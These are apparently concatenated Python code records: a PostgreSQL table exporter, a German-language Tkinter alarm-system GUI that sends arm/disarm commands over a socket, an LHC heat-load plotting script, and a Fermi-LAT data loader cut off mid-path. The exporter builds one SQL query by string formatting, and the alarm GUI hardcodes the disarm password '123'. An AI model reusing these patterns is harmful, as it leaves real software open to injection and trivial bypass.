DatasetDownloader:\n \"\"\"Class that reads tables from a schema and puts them into a file\"\"\"\n\n def __init__(self, setid, db_connection):\n self.db_connection = db_connection\n self.cur = self.db_connection.cursor()\n self.schema = str(setid)\n self.query_man = QueryManager(self.db_connection, None)\n\n def get_csv(self, tablename, foldername, delimiter=',', quotechar='\"', null=\"NULL\", original=False):\n \"\"\"Convert a table from the dataset to a CSV file. The csv file will be stored\n in the specified folder. 
The filename will be the tablename followed by '.csv'.\"\"\"\n\n filename = os.path.join(foldername, tablename + \".csv\")\n\n with open(filename, 'w', encoding=\"utf-8\") as outfile:\n outcsv = csv.writer(outfile, delimiter=delimiter, quotechar=quotechar)\n\n schema = self.__get_schema(original)\n\n self.cur.execute(\n \"SELECT column_name FROM information_schema.columns WHERE table_schema = '{}' AND table_name = '{}'\".format(\n schema, tablename))\n\n # write header\n outcsv.writerow([x[0] for x in self.cur.fetchall()])\n\n self.cur.execute(\n sql.SQL(\"SELECT * FROM {}.{}\").format(sql.Identifier(schema), sql.Identifier(tablename)))\n rows = self.cur.fetchall()\n\n # replace NULL values with parameter 'null'\n for i in range(len(rows)):\n rows[i] = list(rows[i])\n for j in range(len(rows[i])):\n if rows[i][j] is None: rows[i][j] = null\n\n # write rows\n outcsv.writerows(rows)\n\n return tablename + \".csv\"\n\n def get_csv_zip(self, foldername, delimiter=',', quotechar='\"', null=\"NULL\", original=False):\n \"\"\"Converts all tables in a dataset to csv and puts them in a zip file called (setid).zip\n If original is true, the zip will contain folder 'original' and 'edited'\"\"\"\n # create temporary directory to put csv's in\n csv_temp_folder = os.path.join(foldername, \"temp\")\n os.mkdir(csv_temp_folder)\n\n if not original:\n self.__create_csvs(csv_temp_folder, delimiter, quotechar, null, original)\n else:\n # create the two subfolders\n edited_folder = os.path.join(csv_temp_folder, \"edited\")\n original_folder = os.path.join(csv_temp_folder, \"original\")\n os.mkdir(edited_folder)\n os.mkdir(original_folder)\n\n self.__create_csvs(edited_folder, delimiter, quotechar, null, False)\n self.__create_csvs(original_folder, delimiter, quotechar, null, True)\n\n # make a zip of all csv's\n shutil.make_archive(os.path.join(foldername + \"/\" + self.schema), 'zip', csv_temp_folder)\n\n shutil.rmtree(csv_temp_folder)\n return self.schema + \".zip\"\n\n def get_table_dump(self, tablename, foldername, original=False):\n \"\"\"Create a dump file with name (tablename).dump and puts it in 'foldername'\"\"\"\n\n schema = self.__get_schema(original)\n\n filename = os.path.join(foldername, tablename + \".dump\")\n with open(filename, 'w') as dumpfile:\n self.__create_table(dumpfile, schema, tablename)\n self.__insert_values(dumpfile, schema, tablename)\n\n return tablename + \".dump\"\n\n def get_dataset_dump(self, foldername, original=False):\n \"\"\"Create a dump file with name (setid).dump and puts it in 'foldername'\"\"\"\n\n # fetch all tablenames\n table_names = self.query_man.get_table_names(self.schema)\n\n dumpfolder = foldername\n # only used if original == True\n og_schema = self.__get_schema(original)\n\n if original:\n og_table_names = self.query_man.get_table_names(og_schema)\n dumpfolder = os.path.join(foldername, \"temp_folder\")\n os.mkdir(dumpfolder)\n\n with open(os.path.join(dumpfolder, self.schema + \".dump\"), 'w') as dumpfile:\n for table in table_names:\n self.__create_table(dumpfile, self.schema, table)\n\n for table in table_names:\n self.__insert_values(dumpfile, self.schema, table)\n\n if not original:\n return self.schema + \".dump\"\n else:\n with open(os.path.join(dumpfolder, og_schema + \".dump\"), 'w') as dumpfile:\n for table in og_table_names:\n self.__create_table(dumpfile, og_schema, table)\n\n for table in og_table_names:\n self.__insert_values(dumpfile, og_schema, table)\n\n # make a zip of the two dump files\n shutil.make_archive(os.path.join(foldername + 
\"/\" + self.schema), 'zip', dumpfolder)\n\n shutil.rmtree(dumpfolder)\n return self.schema + \".zip\"\n\n def __create_csvs(self, foldername, delimiter=',', quotechar='\"', null=\"NULL\", original=False):\n \"\"\"Converts all tables in a dataset to csv and puts them in (foldername)\"\"\"\n schema = self.__get_schema(original)\n\n # fetch all tablenames\n self.cur.execute(\"SELECT table_name FROM information_schema.tables WHERE table_schema = %s;\",\n [schema])\n result = self.cur.fetchall()\n table_names = [t[0] for t in result]\n\n # create all csv's\n for table in table_names:\n self.get_csv(table, foldername, delimiter, quotechar, null)\n\n def __create_table(self, dumpfile, schema, tablename):\n create_table_str = \"CREATE TABLE \\\"{}\\\" (\\n\".format(tablename)\n type_dict = self.query_man.get_col_types(schema, tablename)\n for col in type_dict:\n create_table_str += \"\\\"{}\\\" {},\\n\".format(col, type_dict[col])\n create_table_str = create_table_str[:-2] + \"\\n);\\n\\n\"\n dumpfile.write(create_table_str)\n\n def __insert_values(self, dumpfile, schema, tablename):\n \"\"\"write all insert statements for a table\"\"\"\n # fetch data\n self.cur.execute(sql.SQL(\"SELECT * FROM {}.{}\").format(sql.Identifier(schema), sql.Identifier(tablename)))\n # insert row statements\n dumpfile.write(\"INSERT INTO \\\"{}\\\" VALUES\\n\".format(tablename))\n rows = str()\n for row in self.cur:\n # turn every attribute into a string and escape single quotes the postgres way\n row_str = tuple([str(x).replace(\"'\", \"''\") for x in row])\n # replace double quotes to single quotes for postgres compatibility\n row_str = str(row_str).replace('\"', \"'\")\n rows += str(row_str) + \",\\n\"\n # replace last comma with a semicolon\n rows = rows[:-2] + \";\\n\"\n dumpfile.write(rows)\n\n\n def __get_schema(self, original):\n return original * \"original_\" + self.schema\n","sub_path":"client/Model/DatasetDownloader.py","file_name":"DatasetDownloader.py","file_ext":"py","file_size_in_byte":6877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"303258487","text":" \nfrom tkinter import *\nimport socket\n\nstatus = 0\ns= socket.socket()\ns.connect(( '172.20.10.2', 30303))\ns.setblocking(False)\n\n\n\ndef aktivieren():\n global status\n online_button.configure(highlightbackground=\"dark blue\")\n aktiv_label.config(text=\"Anlage im alarmfähigen Zustand\")\n aktiv_label.place (x= 215, y=130, width= 250, height= 75)\n s.send(b'1')\n\n antwort_label.place (x=0, y=0, width=0, height= 0)\n false_label.place (x= 0, y=330, width=0, height= 0)\n \n status = 1\n\n\n\n\ndef deaktivieren():\n global status\n kennwort = eingabefeld.get()\n\n if( status == 0):\n false_label.place (x= 0, y=330, width=250, height= 30)\n antwort_label.place (x= 0, y=330, width=0, height= 0)\n eingabefeld.delete(0,END)\n false_label.config(text=\"Anlage bereits deaktiv\")\n\n \n if( status == 1):\n \n if ( kennwort == \"123\"):\n antwort_label.place (x= 0, y=330, width=250, height= 30)\n false_label.place (x= 0, y=330, width=0, height= 0)\n antwort_label.config(text=\"Eingabe erfolgreich\")\n \n aktiv_label.config(text=\"Anlage ist deaktiviert\", fg= \"black\")\n online_button.configure(highlightbackground=\"light blue\")\n\n eingabefeld.delete(0,END)\n s.send(b'0')\n\n status = 0\n \n else:\n false_label.place (x= 0, y=330, width=250, height= 30)\n antwort_label.place (x= 0, y=330, width=0, height= 0)\n\n eingabefeld.delete(0,END)\n false_label.config(text=\"Falsche Eingabe!\")\n 
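# wrong password entered: the system stays armed\n            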
\n\n\n\nAlarmanlage= Tk()\n\nAlarmanlage.title (\"Alarmanlage-Menü\")\nAlarmanlage.geometry(\"500x550\")\n\n\nonline_button = Button(Alarmanlage, text= \"Aktivieren\", highlightbackground= \"light blue\", command= aktivieren)\noffline_button= Button(Alarmanlage, text= \"Deaktivieren\", highlightbackground= \"light blue\", command= deaktivieren)\nend_button= Button(Alarmanlage, text= \"Ausschalten\", highlightbackground=\"red\", command= Alarmanlage.destroy)\n\n\nanweisungs_label = Label(Alarmanlage, font= \"Garamond 15 bold \", fg= \"white\", bg=\"black\",\ntext=\"Folgende Funktionen stehen zur Verfügung:\\nAkivieren: Stehlt die Anlage in den alarmfähigen Zustand.\\nDeaktivieren: Die Anlage wird auf Stand-by geschaltet.\\nAusschalten: Die Anlage wird aussgeschaltet.\")\n \ninfo_label = Label(Alarmanlage, text= \"Zum deaktivieren wird\\n\\\nKennwort benötigt!\")\naktiv_label = Label(Alarmanlage, text= \"Anlage im Alarmfähigen Zustand\", fg=\"green\")\nantwort_label =Label(Alarmanlage, fg= \"green\")\nfalse_label = Label(Alarmanlage, fg= \"red\")\n\neingabefeld =Entry(Alarmanlage, bd=5, width=30)\neingabefeld.insert(10,\"*kennwort*\")\n\n\n\nanweisungs_label.place (x= 0, y=10, width =500, height=100)\nonline_button.place (x= 50, y=130, width=100, height=75)\noffline_button.place (x= 350, y=310, width=100, height= 75)\ninfo_label.place (x= 0, y=240, width=200, height= 100)\neingabefeld.place (x= 200, y=270)\nend_button.place (x= 115, y=430, width=270, height= 75)\n\n\nAlarmanlage.mainloop()\n","sub_path":"Alarmanlage-GUI.py","file_name":"Alarmanlage-GUI.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165156518","text":"from __future__ import division\nimport os\nimport re\nimport argparse\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport dict_utils as du\n\nfrom LHC_Heat_load_dict import main_dict\nfrom LHCMeasurementTools.mystyle import colorprog\nimport LHCMeasurementTools.mystyle as ms\nimport LHCMeasurementTools.savefig as sf\nimport LHCMeasurementTools.LHC_Heatloads as HL\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--pdsave', help='Save plots in pdijksta plot dir.', action='store_true')\nparser.add_argument('--savefig', help='Save plots with specified name.')\nparser.add_argument('--noshow', help='Do not call plt.show.', action='store_true')\nargs = parser.parse_args()\n\n\nx_label='Integrated HL [J]'\nms.mystyle(12)\nplt.rcParams['lines.markersize'] = 7\nplt.close('all')\nbbox_to_anchor=(1.4,1)\ndef legend(sp, bbox_to_anchor=(1,1), loc='upper left', **kwargs):\n sp.legend(bbox_to_anchor=bbox_to_anchor, loc=loc, **kwargs)\n\nmoment = 'stop_squeeze'\n# remove 36b fills\nmask = np.array(map(lambda s: not(s.endswith('_36')), main_dict['filling_pattern']))\nmain_dict = du.mask_dict(main_dict,mask)\n\n# remove low intensity fills\nmask = np.logical_and(main_dict[moment]['n_bunches']['b1'] > 800, main_dict[moment]['n_bunches']['b2'] > 800)\nmain_dict = du.mask_dict(main_dict,mask)\n\nheat_load_dict = main_dict[moment]['heat_load']\ntot_int = main_dict[moment]['intensity']['total']\n\nfirst_fill_2016 = 4857\nfor ctr, fill in enumerate(main_dict['filln']):\n if fill > 4857:\n index_2016 = ctr\n break\n\ntitle_list = ['Arcs', 'Q6 Quads']\nylim_list = [(0,1.5e-12), (0,3.5e-13)]\nmain_keys = ['arc_averages', 'all_cells']\ngood_keys_list = [heat_load_dict[main_keys[0]].keys(), du.q6_keys_list(main_dict)]\n\nint_dict = main_dict['hl_integrated']\nsp = None\nfigs = 
[]\nfig = ms.figure('Integrated heat load', figs)\n#fig.subplots_adjust(left=.06, right=.84, top=.93, hspace=.38, wspace=.42)\n\nfor ctr, (good_keys,main_key, title, ylim) in enumerate(zip(good_keys_list, main_keys, title_list, ylim_list)):\n this_dict = heat_load_dict[main_key]\n\n sp = plt.subplot(2,1,ctr+1, sharex=sp)\n if title == 'Arcs':\n sp.set_ylabel('Integrated HL [J]')\n else:\n sp.set_ylabel('Norm. int. HL [J/m]')\n sp.set_title(title)\n sp.grid(True)\n\n sp2 = sp.twinx()\n sp2.set_ylabel('Normalized HL [W/p+]')\n sp2.set_ylim(*ylim)\n for key_ctr, (key, arr) in enumerate(this_dict.iteritems()):\n if key not in good_keys:\n continue\n\n item = int_dict[main_key][key]\n nan = np.isnan(item)\n item[nan] = 0\n color = colorprog(key_ctr,8)\n sp.plot(main_dict['filln'], np.cumsum(item), label=key, color=color)\n sp2.plot(main_dict['filln'], arr/main_dict[moment]['intensity']['total'], '.', color=color)\n legend(sp)\nsp.set_xlabel('Fill #')\n\nfig = ms.figure('Integrated heat load 2', figs)\n#fig.subplots_adjust(left=.06, right=.84, top=.93, hspace=.38, wspace=.42)\n\n# Arcs and Quads\nsp = None\nylim_list = [(0,None), (0, None)]\nfor ctr, (good_keys,main_key, title, ylim) in enumerate(zip(good_keys_list, main_keys, title_list, ylim_list)):\n this_dict = heat_load_dict[main_key]\n\n sp = plt.subplot(2,2,ctr+1)\n if title == 'Arcs':\n sp.set_ylabel('Normalized HL [W/p+]')\n sp.set_xlabel(x_label)\n else:\n sp.set_ylabel('Normalized HL [W/p+/m]')\n sp.set_xlabel('Norm. Int. HL [J/m]')\n sp.set_title(title)\n sp.grid(True)\n\n for key_ctr, (key, arr) in enumerate(this_dict.iteritems()):\n if key not in good_keys:\n continue\n item = int_dict[main_key][key]\n nan = np.isnan(item)\n item[nan] = 0\n\n if title == 'Arcs':\n len_ = 1.\n else:\n len_ = HL.magnet_length['Q6s_IR'+key[3]][0]\n\n\n year_change = np.sum(item[:index_2016])\n color = colorprog(key_ctr,8)\n norm_hl = this_dict[key]/main_dict[moment]['intensity']['total']\n\n if title == 'Q6 Quads':\n label = key[:4]\n else:\n label = key.replace('_',' ')\n sp.plot(np.cumsum(item)/len_, norm_hl/len_,'.', label=label, color=color)\n if key_ctr == 0:\n label = 'Begin of 2016'\n else:\n label = None\n #sp.axvline(year_change, color=color, lw=2, label=label)\n legend(sp)\n sp.set_ylim(*ylim)\n sp.set_xlim(0,None)\n\n#Bins\ncell_dict = main_dict[moment]['heat_load']['all_cells']\ncell_int_dict = main_dict['hl_integrated']['all_cells']\nn_bins = 10\n\ncell_hls = []\nfor cell, hl_arr in cell_dict.iteritems():\n cell_hls.append((cell, np.mean(hl_arr[-10:])))\n\ncell_hls = filter(lambda x: x[1] > 0, cell_hls)\ncell_hls.sort(key=lambda x: x[1])\nmin_hl, max_hl = cell_hls[0][1], cell_hls[-1][1]\ndelta_hl = (max_hl - min_hl) / (n_bins -1)\nbins = [[]]\nbin_ = bins[0]\nfor cell, hl in cell_hls:\n if hl > min_hl + delta_hl:\n min_hl += delta_hl\n bin_ = []\n bins.append(bin_)\n bin_.append(cell)\n\ndeciles = [[]]\ndecil = deciles[0]\nmax_ctr = 0 + len(cell_hls)/10.\nfor ctr, (cell, _) in enumerate(cell_hls):\n if ctr > max_ctr:\n max_ctr += len(cell_hls)/10.\n decil = []\n deciles.append(decil)\n decil.append(cell)\n\nif True:\n title = 'Deciles'\n bins = deciles\n get_label = lambda x, y: '%i0%%' % (x+1)\n legend_title = None\nelse:\n title = 'Bins'\n get_label = lambda x, y: '%i cells' % len(y)\n legend_title = 'Number of cells'\n\n\nsp = plt.subplot(2,2,3)\nsp.set_xlabel(x_label)\nsp.set_ylabel('Normalized HL [W/p+]')\nsp.set_title(title)\nsp.grid(True)\n\ntot_arr, tot_divisor = 0, 0\ntot_int_arr, tot_int_divisor = 0, 0\nfor ctr, bin_ in 
enumerate(bins):\n color = colorprog(ctr, bins)\n label = get_label(ctr, bin_)\n bin_arr, bin_divisor = 0, 0\n bin_int_arr, bin_int_divisor = 0, 0\n for cell in bin_:\n bin_int_arr += np.nan_to_num(cell_int_dict[cell])\n bin_int_divisor += np.isfinite(cell_int_dict[cell])\n bin_arr += np.nan_to_num(cell_dict[cell])\n bin_divisor += np.isfinite(cell_dict[cell])\n\n tot_arr += bin_arr\n tot_divisor += bin_divisor\n tot_int_arr += bin_int_arr\n tot_int_divisor += bin_int_divisor\n\n bin_hl = bin_arr/bin_divisor\n bin_int_hl = bin_int_arr / bin_int_divisor\n int_hl = np.cumsum(bin_hl)\n\n sp.plot(np.cumsum(bin_int_hl), bin_hl/tot_int, '.', color=color, label=label)\n\ntot_hl = tot_arr / tot_divisor\ntot_int_hl = tot_int_arr / tot_int_divisor\nsp.plot(np.cumsum(tot_int_hl), tot_hl/tot_int, '.', color='black', label='Average')\n\nlegend(sp, title=legend_title)\nsp.set_xlim(0,None)\n\n\n# Special cells\nsp = plt.subplot(2,2,4)\nsp.set_xlabel(x_label)\nsp.set_ylabel('Normalized HL [W/p+]')\nsp.set_title('Special cell dipoles')\nsp.grid(True)\n\nspecial_dict = main_dict[moment]['heat_load']['special_cells']\nre_special_dipole = re.compile('^.*_D[234]$')\nspecial_dip_keys = filter(re_special_dipole.match, special_dict.keys())\nfor ctr, key in enumerate(special_dip_keys):\n if key in ('33L5_D4', '33L5_D3'): continue\n\n norm_hl = special_dict[key] / tot_int\n int_hl = int_dict['special_cells'][key]\n color=ms.colorprog(ctr, special_dip_keys)\n label = key.replace('_', ' ')\n sp.plot(np.cumsum(int_hl), norm_hl, '.', label=key, color=color)\n\nsp.set_ylim(-0.1e-13,None)\nlegend(sp)\n\nfig = ms.figure('Standalone D3 in LSS 45', figs)\nsp = plt.subplot(2,2,1)\nsp.set_xlabel(x_label)\nsp.set_ylabel('Normalized HL [W/p+]')\nsp.set_title('Standalone D3 in LSS 45')\nsp.grid(True)\n\ncells_dict = main_dict[moment]['heat_load']['all_cells']\n\nctr = 0\nfor key, hl in cells_dict.iteritems():\n # Correct valve variables for standalone magnet:\n # [05L4: QRLFF_05L4_CV947.POSST (to be checked)]\n # This was wrong (13.7.17)! 
correct 05L4 is 'QRLEB_05L4_QBS947.POSST'\n    # 05R4: QRLEB_05L4_CV947.POSST\n    if (key[:4] == '05L4' and key.endswith('_2')) or (key[:4] == '05R4' and not key.endswith('_2')):\n        label = key[:4]+'_standalone'\n        color = ['black', 'red'][ctr]\n        norm_hl = hl / tot_int\n        int_hl = int_dict['all_cells'][key]\n        if not np.all(np.isnan(hl)):\n            sp.plot(np.cumsum(int_hl), norm_hl, '.', label=label, color=color)\n        ctr += 1\n\nif args.pdsave:\n    sf.pdijksta(figs)\nelif args.savefig:\n    for num in plt.get_fignums():\n        fig = plt.figure(num)\n        plt.suptitle('')\n        fig.subplots_adjust(right=0.85, wspace=0.75, hspace=.38)\n        fig.savefig(os.path.expanduser(args.savefig) + '_%i.png' % num)\n\nif not args.noshow:\n    plt.show()\n","sub_path":"001_integrated_hl.py","file_name":"001_integrated_hl.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"270697431","text":"###############################################################################\n#E^2 dN/dE = (#events)*(E**2)/(exposure*pixels*(energy band width))\n#construct one value for each of the back/foreground for each version of each energy level\n#should result in 32 values plotted on a log graph, 4 horizontal values and 8 values for each horizontal\n###############################################################################\nfrom __future__ import division\nimport numpy\nimport scipy\nimport pylab as plt\nfrom numpy import pi, sqrt  # pi and sqrt are used below but were never imported\n###############################################################################\n#importing data\n###############################################################################\nlowR1V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R1_version1.txt\")\nlowR1V1 = numpy.asmatrix(lowR1V1)\nlowR1V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R1_version2.txt\")\nlowR1V2 = numpy.asmatrix(lowR1V2)\nlowR1V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R1_version3.txt\")\nlowR1V3 = numpy.asmatrix(lowR1V3)\nlowR1V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R1_version4.txt\")\nlowR1V4 = numpy.asmatrix(lowR1V4)\nlowR2V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R2_version1.txt\")\nlowR2V1 = numpy.asmatrix(lowR2V1)\nlowR2V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R2_version2.txt\")\nlowR2V2 = numpy.asmatrix(lowR2V2)\nlowR2V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R2_version3.txt\")\nlowR2V3 = numpy.asmatrix(lowR2V3)\nlowR2V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R2_version4.txt\")\nlowR2V4 = numpy.asmatrix(lowR2V4)\nlowR3V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R3_version1.txt\")\nlowR3V1 = 
numpy.asmatrix(lowR3V1)\nlowR3V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R3_version2.txt\")\nlowR3V2 = numpy.asmatrix(lowR3V2)\nlowR3V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R3_version3.txt\")\nlowR3V3 = numpy.asmatrix(lowR3V3)\nlowR3V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_1467MeV_R3_version4.txt\")\nlowR3V4 = numpy.asmatrix(lowR3V4)\nmidR1V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R1_version1.txt\")\nmidR1V1 = numpy.asmatrix(midR1V1)\nmidR1V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R1_version2.txt\")\nmidR1V2 = numpy.asmatrix(midR1V2)\nmidR1V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R1_version3.txt\")\nmidR1V3 = numpy.asmatrix(midR1V3)\nmidR1V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R1_version4.txt\")\nmidR1V4 = numpy.asmatrix(midR1V4)\nmidR2V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R2_version1.txt\")\nmidR2V1 = numpy.asmatrix(midR2V1)\nmidR2V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R2_version2.txt\")\nmidR2V2 = numpy.asmatrix(midR2V2)\nmidR2V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R2_version3.txt\")\nmidR2V3 = numpy.asmatrix(midR2V3)\nmidR2V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R2_version4.txt\")\nmidR2V4 = numpy.asmatrix(midR2V4)\nmidR3V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R3_version1.txt\")\nmidR3V1 = numpy.asmatrix(midR3V1)\nmidR3V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R3_version2.txt\")\nmidR3V2 = numpy.asmatrix(midR3V2)\nmidR3V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R3_version3.txt\")\nmidR3V3 = numpy.asmatrix(midR3V3)\nmidR3V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_3161MeV_R3_version4.txt\")\nmidR3V4 = numpy.asmatrix(midR3V4)\nhieR1V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R1_version1.txt\")\nhieR1V1 = numpy.asmatrix(hieR1V1)\nhieR1V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab 
Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R1_version2.txt\")\nhieR1V2 = numpy.asmatrix(hieR1V2)\nhieR1V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R1_version3.txt\")\nhieR1V3 = numpy.asmatrix(hieR1V3)\nhieR1V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R1_version4.txt\")\nhieR1V4 = numpy.asmatrix(hieR1V4)\nhieR2V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R2_version1.txt\")\nhieR2V1 = numpy.asmatrix(hieR2V1)\nhieR2V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R2_version2.txt\")\nhieR2V2 = numpy.asmatrix(hieR2V2)\nhieR2V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R2_version3.txt\")\nhieR2V3 = numpy.asmatrix(hieR2V3)\nhieR2V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R2_version4.txt\")\nhieR2V4 = numpy.asmatrix(hieR2V4)\nhieR3V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R3_version1.txt\")\nhieR3V1 = numpy.asmatrix(hieR3V1)\nhieR3V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R3_version2.txt\")\nhieR3V2 = numpy.asmatrix(hieR3V2)\nhieR3V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R3_version3.txt\")\nhieR3V3 = numpy.asmatrix(hieR3V3)\nhieR3V4 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_6809MeV_R3_version4.txt\")\nhieR3V4 = numpy.asmatrix(hieR3V4)\nmaxR1V1 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R1_version1.txt\")\nmaxR1V1 = numpy.asmatrix(maxR1V1)\nmaxR1V2 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R1_version2.txt\")\nmaxR1V2 = numpy.asmatrix(maxR1V2)\nmaxR1V3 = numpy.loadtxt(\"C:/Users/Richard Zhu/Desktop/Dropbox/Fermilab Work/DSphsTest/LAT_P7_UrsaMinorDwarfSpheroidal_Clean_239557417_335924215_Short_14676MeV_R1_version3.txt\")\nmaxR1V3 = numpy.asmatrix(maxR1V3)\nmaxR1V4 = numpy.loadtxt(\"C:/Users/Richard 